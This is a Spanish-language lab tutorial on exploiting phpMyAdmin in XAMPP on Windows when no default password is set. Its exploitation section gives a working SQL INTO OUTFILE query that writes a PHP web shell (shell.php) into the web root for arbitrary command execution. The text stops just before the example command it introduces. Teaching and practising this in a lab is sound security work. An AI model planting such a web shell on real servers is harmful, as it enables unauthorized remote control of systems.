Creación y Explotación de un laboratorio phpMyAdmin Vulnerable

Creación y Explotación de un laboratorio phpMyAdmin Vulnerable en Sistemas Operativos Windows

Actualmente hasta la ultima versión de phpMyAdmin en el paquete de software XAMMP no tiene tiene ninguna contraseña por defecto, y los administradores de sistemas aveces olvidan crear una nueva o  modificar las contraseñas existentes por defecto para la administración.

Se demostrara como vulnerar y aprovechar esta brecha de seguridad creando una puerta trasera en donde podamos ejecutar cualquier comando mediante la terminal de Windows que deseemos.

Preparación del laboratorio:

Primero crearemos un laboratorio vulnerable para esta demostración.

Descargaremos la ultima versión del paquete de software XAMMP del siguiente enlace:

https://www.apachefriends.org/es/index.html

Una vez descargada procederemos a instalarla mediante el archivo ejecutable descargado en cualquier tipo de sistema operativo Windows ya sea Servidor o Escritorio.

Nos aparecerá esta ventana donde tendremos el panel de administración de los servicios que necesitemos arrancar, en este arrancaremos Apache y MySQL:

Tras arrancar los servicios podremos acceder al Dashboard de XAMPP, esto nos asegurar de que el laboratorio funciona correctamente.

Con estos pasos tendremos listo nuestro laboratorio para poder explotarlo.

Explotación:

Desde otra maquina, accederemos al Dashboard de PhpMyAdmin, en nuestro caso no tiene contraseña y en otros casos pueda que tengas las contraseñas por defecto, como se muestra a continuación:

En la pestaña SQL ejecutaremos la siguiente consulta:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"

Este nos creara un archivo en el directorio raíz llamado shell.php, este archivo o puerta trasera nos permitirá ejecutar comandos en el cmd de Wndows.

Nos aseguramos de que la consulta se haya ejecutado correctamente.

Y por ultimo podremos acceder a nuestra puerta trasera en donde podremos ejecutar cualquier comando que deseemos mediante una consola de Windows, para poder acceder a ella simplemente escribiremos shell.php seguido del comando que deseemos ejecutar, a continuación se muestra un ejemplo: